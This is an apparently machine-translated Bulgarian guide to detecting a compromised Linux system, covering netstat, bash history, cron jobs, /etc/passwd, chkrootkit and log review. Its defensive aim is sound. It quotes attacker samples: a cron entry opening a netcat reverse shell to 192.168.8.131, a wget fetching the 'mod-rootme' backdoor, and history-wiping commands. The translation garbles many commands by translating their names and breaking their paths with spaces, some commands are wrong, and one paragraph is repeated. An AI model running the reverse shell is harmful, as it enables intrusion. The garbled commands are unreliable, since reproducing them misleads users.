Как да определите дали дадена Linux система е компрометирана

Има много причини, поради които хакерът може да проникне в системата ви и да ви създаде сериозни проблеми. Преди години може би е било да се демонстрират уменията си, но в днешно време намеренията зад подобни дейности могат да бъдат много по-сложни с много по-широкообхватни последици за жертвата. Това може да звучи очевидно, но само защото „всичко изглежда наред“, това не означава, че всичко е наред. Хакерите могат да проникнат във вашата система, без да ви уведомят и да я заразят със злонамерен софтуер, за да поемат пълен контрол и дори за странично движение между системите. Злонамереният софтуер може да бъде скрит в системата и служи като задна врата или система за управление и управление за хакери за извършване на злонамерени дейности във вашата система.По-добре е да сте в безопасност, отколкото да съжалявате. Може да не осъзнаете веднага, че вашата система е хакната, но има няколко начина, по които можете да определите дали вашата система е компрометирана. Тази статия ще обсъди как да определите дали Linux системата е компрометирана от неупълномощено лице или бот влиза в системата ви, за да извършва злонамерени дейности.

Netstat

Netstat е важна програма за TCP / IP мрежов команден ред, която предоставя информация и статистика за използваните протоколи и активните мрежови връзки.

Ние ще използваме netstat на примерна машина-жертва, за да проверите за нещо подозрително в активните мрежови връзки чрез следната команда:

[имейл защитен]: ~ $ netstat -antp

Тук ще видим всички активни в момента връзки. Сега ще потърсим връзка, която не трябва да има.

Ето го, активна връзка на PORT 44999 (порт, който не трябва да бъде отворен).Можем да видим други подробности за връзката, като например PID, и името на програмата, която се изпълнява в последната колона. В този случай PID е 1555 и злонамереният полезен товар, който се изпълнява, е ./ черупка.елф файл.

Друга команда за проверка на портовете, които в момента слушат и са активни във вашата система, е както следва:

[имейл защитен]: ~ $ netstat -la

Това е доста разхвърлян резултат. За да филтрираме слушането и установените връзки, ще използваме следната команда:

[имейл защитен]: ~ $ netstat -la | grep „СЛУШАЙТЕ“ „УСТАНОВЕНО“

Това ще ви даде само важните за вас резултати, така че да можете да сортирате по-лесно тези резултати. Можем да видим активна връзка на пристанище 44999 в горните резултати.

След като разпознаете злонамерения процес, можете да убиете процеса чрез следните команди. Ще отбележим PID на процеса с помощта на командата netstat и убийте процеса чрез следната команда:

[имейл защитен]: ~ $ убий 1555

~.bash-история

Linux води запис кои потребители са влезли в системата, от кой IP, кога и за колко време.

Можете да получите достъп до тази информация чрез последен команда. Резултатът от тази команда ще изглежда по следния начин:

[имейл защитен]: ~ $ последен

Резултатът показва потребителското име в първата колона, терминала във втората, адреса на източника в третата, времето за влизане в четвъртата колона и общото време на сесията, регистрирано в последната колона. В този случай потребителите усман и ubuntu все още сте влезли. Ако видите някаква сесия, която не е разрешена или изглежда злонамерена, обърнете се към последния раздел на тази статия.

Историята на регистрацията се съхранява в ~.bash-история файл. Така че историята може да бъде премахната лесно, като изтриете .bash-история файл. Това действие често се извършва от нападатели, за да прикрие следите си.

[имейл защитен]: ~ $ cat .bash_history

Тази команда ще покаже командите, изпълнявани във вашата система, с най-новата команда, изпълнена в долната част на списъка.

Историята може да бъде изчистена чрез следната команда:

[имейл защитен]: ~ $ история -c

Тази команда ще изтрие историята само от терминала, който използвате в момента. И така, има по-правилен начин да направите това:

[имейл защитен]: ~ $ cat / dev / null> ~ /.bash_history

Това ще изчисти съдържанието на историята, но ще запази файла на място. Така че, ако виждате само текущия си вход след стартиране на последен команда, това изобщо не е добър знак. Това показва, че вашата система може да е била компрометирана и че нападателят вероятно е изтрил историята.

Ако подозирате злонамерен потребител или IP, влезте като този потребител и изпълнете командата история, както следва:

[имейл защитен]: ~ $ su
[имейл защитен]: ~ $ история

Тази команда ще покаже историята на командите, като прочете файла .bash-история в /У дома папка на този потребител. Потърсете внимателно wget, къдрица, или netcat команди, в случай че нападателят е използвал тези команди за прехвърляне на файлове или за инсталиране извън инструменти за репо, като крипто-майнери или спам ботове.

Обърнете внимание на примера по-долу:

По-горе можете да видите командата „wget https: // github.com / sajith / mod-rootme.” В тази команда хакерът се опита да получи достъп до файл, който не е в репо, използвайки wget да изтеглите задната врата, наречена „mod-root me“, и да я инсталирате на вашата система. Тази команда в историята означава, че системата е компрометирана и е била backdoored от нападател.

Не забравяйте, че този файл може лесно да бъде изгонен или да бъде произведено неговото вещество. Данните, дадени от тази команда, не трябва да се приемат като определена реалност. И все пак, в случай че нападателят изпълни „лоша“ команда и пренебрегне да евакуира историята, той ще бъде там.

Крон Джобс

Cron заданията могат да служат като жизненоважен инструмент, когато са конфигурирани да настроят обратна черупка на атакуващата машина. Редактирането на cron работни места е важно умение, както и знанието как да ги видите.

За да видим заданията cron, изпълнявани за текущия потребител, ще използваме следната команда:

[имейл защитен]: ~ $ crontab -l

За да разгледаме заданията на cron, изпълнявани за друг потребител (в този случай Ubuntu), ще използваме следната команда:

[имейл защитен]: ~ $ crontab -u ubuntu -l

За да преглеждаме ежедневни, почасови, седмични и месечни задания cron, ще използваме следните команди:

Ежедневни Cron работни места:

[имейл защитен]: ~ $ ls -la / etc / cron.ежедневно

Почасови Cron работни места:

[имейл защитен]: ~ $ ls -la / etc / cron.на час

Седмични Cron работни места:

[имейл защитен]: ~ $ ls -la / etc / cron.седмично

Вземете пример:

Нападателят може да постави cron работа / etc / crontab който изпълнява злонамерена команда 10 минути след всеки час. Атакуващият може също да стартира злонамерена услуга или обратна задна врата на черупката чрез netcat или някаква друга полезност. Когато изпълните командата $ ~ crontab -l, ще видите cron работа, работеща под:

[имейл защитен]: ~ $ crontab -l
CT = $ (crontab -l)
CT = $ CT $ '\ n10 * * * * nc -e / bin / bash 192.168.8.131 44999 '
printf "$ CT" | crontab -
ps aux

За да проверите правилно дали вашата система е била компрометирана, също е важно да видите текущите процеси. Има случаи, когато някои неоторизирани процеси не консумират достатъчно използване на процесора, за да бъдат изброени в Горна част команда. Това е мястото, където ще използваме пс команда за показване на всички текущи процеси.

[имейл защитен]: ~ $ ps auxf

Първата колона показва потребителя, втората колона показва уникален идентификатор на процеса, а използването на процесора и паметта е показано в следващите колони.

Тази таблица ще ви предостави най-много информация. Трябва да проверите всеки работещ процес, за да потърсите нещо особено, за да разберете дали системата е компрометирана или не. В случай, че откриете нещо подозрително, потърсете го в Google или го стартирайте с също команда, както е показано по-горе. Това е добър навик за бягане пс команди на вашия сървър и това ще увеличи шансовете ви да откриете нещо подозрително или извън ежедневието ви.

/ и т.н. / passwd

The / и т.н. / passwd файл записва всеки потребител в системата. Това е файл, разделен с двоеточие, съдържащ информация като потребителско име, идентификатор на потребителя, криптирана парола, GroupID (GID), пълно име на потребител, домашна директория на потребителя и обвивка за вход.

Ако нападателят проникне във вашата система, има вероятност той или тя да създаде още няколко потребители, да държи нещата отделно или да създаде задната врата в системата ви, за да се върне обратно, използвайки тази задна врата. Докато проверявате дали вашата система е била компрометирана, трябва също да проверите всеки потребител във файла / etc / passwd. Въведете следната команда, за да го направите:

[имейл защитен]: ~ $ cat etc / passwd

Тази команда ще ви даде изход, подобен на този по-долу:

gnome-Initial-Setup: x: 120: 65534 :: / run / gnome-Initial-Setup /: / bin / false
gdm: x: 121: 125: Gnome Display Manager: / var / lib / gdm3: / bin / false
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: Администратор на PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
debian-tor: x: 123: 129 :: / var / lib / tor: / bin / false
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
lightdm: x: 125: 132: Мениджър на светлинния дисплей: / var / lib / lightdm: / bin / false
Debian-gdm: x: 124: 131: Диспечер на дисплея на Gnome: / var / lib / gdm3: / bin / false
анонимен: x: 1002: 1002: ,,,: / home / анонимен: / bin / bash

Сега ще искате да потърсите всеки потребител, за когото не сте запознати. В този пример можете да видите потребител във файла с име „анонимен.”Друго важно нещо, което трябва да се отбележи, е, че ако нападателят е създал потребител, с който да влезе отново, потребителят също ще има присвоена черупка“ / bin / bash ”. Така че, можете да стесните търсенето, като хванете следния изход:

[имейл защитен]: ~ $ cat / etc / passwd | grep -i "/ bin / bash"
usman: x: 1000: 1000: usman: / home / usman: / bin / bash
postgres: x: 122: 128: Администратор на PostgreSQL ,,,: / var / lib / postgresql: / bin / bash
ubuntu: x: 1001: 1001: ubuntu ,,,: / home / ubuntu: / bin / bash
анонимен: x: 1002: 1002: ,,,: / home / анонимен: / bin / bash

Можете да извършите допълнителна „баш магия“, за да прецизирате резултата си.

[имейл защитен]: ~ $ cat / etc / passwd | grep -i "/ bin / bash" | cut -d ":" -f 1
усман
postgres
ubuntu
анонимен

намирам

Търсенията въз основа на времето са полезни за бързо триаж. Потребителят може също така да променя времеви марки за промяна на файлове. За да подобрите надеждността, включете ctime в критериите, тъй като е много по-трудно да се подправя, защото изисква модификации на някои файлове на ниво.

Можете да използвате следната команда, за да намерите файлове, създадени и модифицирани през последните 5 дни:

[имейл защитен]: ~ $ find / -mtime -o -ctime -5

За да намерим всички SUID файлове, притежавани от root, и да проверим дали има неочаквани записи в списъците, ще използваме следната команда:

[имейл защитен]: ~ $ find / -perm -4000 -потребител корен -тип f

За да намерим всички SGID (set user ID) файлове, притежавани от root, и да проверим дали в списъците има неочаквани записи, ще използваме следната команда:

[имейл защитен]: ~ $ find / -perm -6000 -type f

Chkrootkit

Руткити са едно от най-лошите неща, които могат да се случат на системата и са една от най-опасните атаки, по-опасни от зловредния софтуер и вирусите, както по отношение на щетите, които причиняват на системата, така и при затрудненията при тяхното откриване.

Те са проектирани по такъв начин, че да останат скрити и да извършват злонамерени неща като кражба на кредитни карти и информация за онлайн банкиране. Руткити дайте възможност на киберпрестъпниците да контролират вашата компютърна система. Руткитите също помагат на нападателя да наблюдава натискането на клавишите ви и да деактивира вашия антивирусен софтуер, което прави още по-лесно кражбата на лична информация.

Тези видове зловреден софтуер могат да останат във вашата система дълго време, без потребителят дори да забележи, и могат да причинят сериозни щети. Веднъж Руткит е открит, няма друг начин освен да се преинсталира цялата система. Понякога тези атаки могат дори да причинят хардуерен отказ.

За щастие има някои инструменти, които могат да помогнат за откриване Руткити на Linux системи, като Lynis, Clam AV или LMD (Linux Malware Detect). Можете да проверите системата си за известни Руткити като използвате командите по-долу.

Първо инсталирайте Chkrootkit чрез следната команда:

[имейл защитен]: ~ $ sudo apt install chkrootkit

Това ще инсталира Chkrootkit инструмент. Можете да използвате този инструмент, за да проверите за Rootkits чрез следната команда:

[имейл защитен]: ~ $ sudo chkrootkit

Пакетът Chkrootkit се състои от скрипт на обвивката, който проверява системните двоични файлове за модификация на руткит, както и няколко програми, които проверяват за различни проблеми със сигурността. В горния случай пакетът провери за признак на Rootkit в системата и не намери такъв. Е, това е добър знак!

Регистрационни файлове на Linux

Регистрационните файлове на Linux дават график на събитията в работната рамка и приложенията на Linux и са важен инструмент за разследване, когато имате проблеми. Основната задача, която администраторът трябва да изпълни, когато разбере, че системата е компрометирана, трябва да разчленява всички записи в дневника.

За изрични проблеми с приложението на работната зона, записите в дневника се поддържат в контакт с различни области. Например Chrome съставя отчети за сривове в '~ /.chrome / Crash Reports '), където приложението в работна област съставя регистрационни файлове, разчитащи на инженера, и показва дали приложението взема предвид персонализираната подредба на дневниците. Записите са в/ var / log директория. Има Linux дневници за всичко: фреймворк, порции, началници на пакети, форми за зареждане, Xorg, Apache и MySQL. В тази статия темата ще се концентрира изрично върху регистрационните дневници на Linux.

Можете да преминете към този каталог, като използвате реда на компактдисковете. Трябва да имате root права за преглед или промяна на регистрационни файлове.

[имейл защитен]: ~ $ cd / var / log

Инструкции за преглед на дневници на Linux

Използвайте следните команди, за да видите необходимите документи в дневника.

Регистрационните файлове на Linux могат да се видят с командата cd / var / log, в този момент, като съставите поръчката, за да видите дневниците, прибрани под този каталог. Един от най-значимите регистрационни файлове е syslog, който регистрира много важни регистрационни файлове.

ubuntu @ ubuntu: syslog на котка

За да дезинфекцираме резултата, ще използваме „по-малко" команда.

ubuntu @ ubuntu: syslog на котка | по-малко

Въведете командата var / log / syslog да видите доста неща под syslog файл. Фокусирането върху определен въпрос ще отнеме известно време, тъй като този запис обикновено е дълъг. Натиснете Shift + G, за да превъртите надолу в записа до END, означено с „END.”

Можете също така да видите регистрационните файлове с помощта на dmesg, който отпечатва опората на пръстена на частта. Тази функция отпечатва всичко и ви изпраща, доколкото е възможно, заедно с документа. От този момент можете да използвате поръчката dmesg | по-малко за да прегледаме добива. В случай, че трябва да видите регистрационните файлове за даден потребител, ще трябва да изпълните следната команда:

dmesg - съоръжение = потребител

В заключение можете да използвате опашката, за да видите документите в дневника. Това е малка, но полезна програма, която човек може да използва, тъй като се използва за показване на последната част от регистрационните файлове, където проблемът най-вероятно е възникнал. Можете също така да посочите броя на последните байтове или редове, които да се показват в командата tail. За това използвайте командата tail / var / log / syslog. Има много начини да разглеждате регистрационните файлове.

За определен брой редове (моделът разглежда последните 5 реда) въведете следната команда:

[имейл защитен]: ~ $ tail -f -n 5 / var / log / syslog

Това ще отпечата последните 5 реда. Когато дойде друга линия, бившата ще бъде евакуирана. За да избягате от реда на опашката, натиснете Ctrl + X.

Важни дневници на Linux

Основните четири дневника на Linux включват:

Регистрационни файлове
Дневници на събитията
Сервизни дневници
Системни дневници

ubuntu @ ubuntu: syslog на котка | по-малко

/ var / log / syslog или / var / log / messages: общи съобщения, точно като данни, свързани с рамката. Този дневник съхранява цялата информация за действията в световната рамка.

ubuntu @ ubuntu: котка авт.дневник | по-малко

/ var / log / auth.дневник или / var / log / secure: съхранява регистрационни файлове за проверка, включително ефективни и неподготвени данни за вход и стратегии за валидиране. Използване на Debian и Ubuntu / var / log / auth.дневник за съхраняване на опити за влизане, докато Redhat и CentOS използват / var / log / secure за съхраняване на регистрационни файлове.

ubuntu @ ubuntu: boot boot.дневник | по-малко

/ var / log / boot.дневник: съдържа информация за зареждане и съобщения по време на стартиране.

ubuntu @ ubuntu: cat maillog | по-малко

/ var / log / maillog или / var / log / mail.дневник: съхранява всички регистрационни файлове, идентифицирани с пощенски сървъри; ценно, когато имате нужда от данни за postfix, smtpd или някакви свързани с имейл администрации, работещи на вашия сървър.

ubuntu @ ubuntu: котка керн | по-малко

/ var / log / kern: съдържа информация за дневниците на ядрото. Този дневник е важен за проучване на потребителски порции.

ubuntu @ ubuntu: котка dmesg | по-малко

/ var / log / dmesg: съдържа съобщения, които идентифицират драйвери за притурки. Поръчката dmesg може да се използва, за да видите съобщенията в този запис.

ubuntu @ ubuntu: catlog log | по-малко

/ var / log / faillog: съдържа данни за всички неуспешни опити за влизане, ценни за събиране на битове знания при опити за проникване на сигурност; например тези, които искат да хакнат сертификати за вход, точно като нападения с животинска сила.

ubuntu @ ubuntu: котка cron | по-малко

/ var / log / cron: съхранява всички съобщения, свързани с Cron; например cron, или когато демонът cron е започнал призвание, свързани съобщения за разочарование и т.н.

ubuntu @ ubuntu: котка yum.дневник | по-малко

/ var / log / yum.дневник: при изключения шанс да въведете пакети, използващи yum поръчката, този дневник съхранява всички свързани данни, което може да бъде полезно при решаването дали пакет и всички сегменти са били ефективно въведени.

ubuntu @ ubuntu: котка httpd | по-малко

/ var / log / httpd / или / var / log / apache2: тези две директории се използват за съхраняване на всички видове регистрационни файлове за Apache HTTP сървър, включително дневници за достъп и регистрационни файлове за грешки. Файлът error_log съдържа всички лоши заявки, получени от http сървъра. Тези грешки включват проблеми с паметта и други грешки, свързани с рамката. Дневникът на достъп съдържа запис на всички искания, получени чрез HTTP.

ubuntu @ ubuntu: котка mysqld.дневник | по-малко

/ var / log / mysqld.дневник или/ var / log / mysql.дневник : регистрационният документ на MySQL, който регистрира всички съобщения за грешки, отстраняване на грешки и успех. Това е друго събитие, при което рамката насочва към регистъра; RedHat, CentOS, Fedora и други базирани на RedHat рамки използват / var / log / mysqld.log, докато Debian / Ubuntu използват / var / log / mysql.дневник каталог.

Инструменти за преглед на дневници на Linux

Днес има много проследяващи журнали и устройства за проверка с отворен код, което прави избора на правилните активи за регистрационните файлове по-лесен, отколкото може да подозирате. Безплатните и отворени кодове за регистрация могат да работят на всяка система, за да свършат работата. Ето пет от най-добрите, които съм използвал в миналото, без конкретен ред.

СИВИ ЛОГ

Започнал в Германия през 2011 г., в момента Graylog се предлага като устройство с отворен код или като бизнес споразумение. Graylog е предназначен да бъде обединена рамка за регистрация на борда, която приема информационни потоци от различни сървъри или крайни точки и ви позволява бързо да разглеждате или разбивате тези данни.

Graylog събра положителна известност сред рамковите глави в резултат на своята простота и гъвкавост. Повечето уеб начинания започват малко, но все пак могат да се развиват експоненциално. Graylog може да коригира стекове върху система от бекенд сървъри и да обработва няколко терабайта дневник информация всеки ден.

Председателите на ИТ ще видят предния край на интерфейса на GrayLog толкова лесен за използване и енергичен в своята полезност. Graylog заобикаля идеята за таблата, което позволява на потребителите да избират вида на измерванията или източниците на информация, които намират за важни, и бързо да наблюдават наклоните след известно време.

Когато настъпи епизод за сигурност или екзекуция, председателите на ИТ трябва да имат възможност да проследяват проявите до основния драйвер възможно най-бързо, колкото може да се очаква разумно. Функцията за търсене на Graylog прави тази задача лесна. Този инструмент е работил в адаптацията към вътрешни откази, които могат да стартират многобройни начинания, така че да можете да разбиете няколко потенциални опасности заедно.

НАГИОС

Започнат от един разработчик през 1999 г., Nagios оттогава напредва в един от най-солидните инструменти с отворен код за надзор на информацията в дневника. Настоящото предаване на Nagios може да бъде внедрено в сървъри, работещи с всякакъв вид операционна система (Linux, Windows и др.).

Основният елемент на Nagios е лог сървър, който рационализира асортимента от информация и прави данните постепенно достъпни за ръководителите на рамки. Двигателят на сървъра на Nagios ще улавя информацията постепенно и ще я подава в новаторски инструмент за търсене. Включването с друга крайна точка или приложение е проста бакшиш за този присъщ съветник за подреждане.

Nagios често се използва в асоциации, които трябва да проверят сигурността на своите квартали и могат да прегледат обхвата на свързаните със системата случаи, за да помогнат за роботизиране на предупрежденията. Nagios може да бъде програмиран да изпълнява конкретни задачи, когато е изпълнено определено условие, което позволява на потребителите да откриват проблеми дори преди да бъдат включени човешките нужди.

Като основен аспект на оценяването на системата, Nagios ще канализира регистрационна информация в зависимост от географския район, от който започва. Пълни табла за управление с иновации за картографиране могат да бъдат приложени, за да видите поточното предаване на уеб трафика.

ЛОГАЛИЗ

Logalyze произвежда инструменти с отворен код за рамкови директори или системни администратори и специалисти по сигурността, за да им помогне с надзора на сървърните регистрационни файлове и да им позволи да се съсредоточат върху трансформирането на дневниците в ценна информация. Основният елемент на този инструмент е, че е достъпен като безплатно изтегляне за домашна или бизнес употреба.

Като основен аспект на оценяването на системата, Nagios ще канализира регистрационна информация в зависимост от географския район, от който започва. Пълни табла за управление с иновации за картографиране могат да бъдат внедрени, за да видите поточното предаване на уеб трафика.

Какво трябва да направите, ако сте били компрометирани?

Основното нещо е да не се паникьосвате, особено ако неупълномощеното лице е влязло в системата точно сега. Трябва да имате възможност да поемете обратно контрола върху машината, преди другият да разбере, че знаете за тях. В случай, че те знаят, че сте наясно с тяхното присъствие, нападателят може да ви предпази от сървъра и да започне да унищожава вашата система. Ако не сте толкова техничен, тогава всичко, което трябва да направите, е да изключите незабавно целия сървър. Можете да изключите сървъра чрез следните команди:

[имейл защитен]: ~ $ shutdown -h сега

Или

[имейл защитен]: ~ $ systemctl poweroff

Друг начин да направите това е като влезете в контролния панел на вашия доставчик на хостинг услуги и го изключите оттам. След като сървърът е изключен, можете да работите по правилата на защитната стена, които са необходими, и да се консултирате с всеки за съдействие в собствено време.

В случай, че се чувствате по-уверени и вашият хостинг доставчик има защитна стена нагоре по веригата, създайте и активирайте следните две правила:

Разрешете SSH трафик само от вашия IP адрес.
Блокирайте всичко останало, не само SSH, но и всеки протокол, работещ на всеки порт.

За да проверите за активни SSH сесии, използвайте следната команда:

[имейл защитен]: ~ $ ss | grep ssh

Използвайте следната команда, за да убиете тяхната SSH сесия:

[имейл защитен]: ~ $ kill

Това ще убие тяхната SSH сесия и ще ви даде достъп до сървъра. В случай че нямате достъп до защитна стена нагоре по веригата, тогава ще трябва да създадете и активирате правилата на защитната стена на самия сървър. След това, когато настройват правилата на защитната стена, убийте SSH сесията на неупълномощен потребител чрез командата „kill“.

Последна техника, когато е налична, влезте в сървъра чрез външна връзка, като серийна конзола. Спрете всички мрежи чрез следната команда:

[имейл защитен]: ~ $ systemctl спиране на мрежата.обслужване

Това напълно ще спре всяка система да стигне до вас, така че вече ще можете да активирате контролите на защитната стена по ваше собствено време.

След като възстановите контрола върху сървъра, не му се доверявайте лесно. Не се опитвайте да поправяте нещата и да ги използвате повторно. Това, което е счупено, не може да бъде поправено. Никога не бихте разбрали какво може да направи нападателят и затова никога не трябва да сте сигурни, че сървърът е защитен. Така че преинсталирането трябва да бъде вашата крайна стъпка.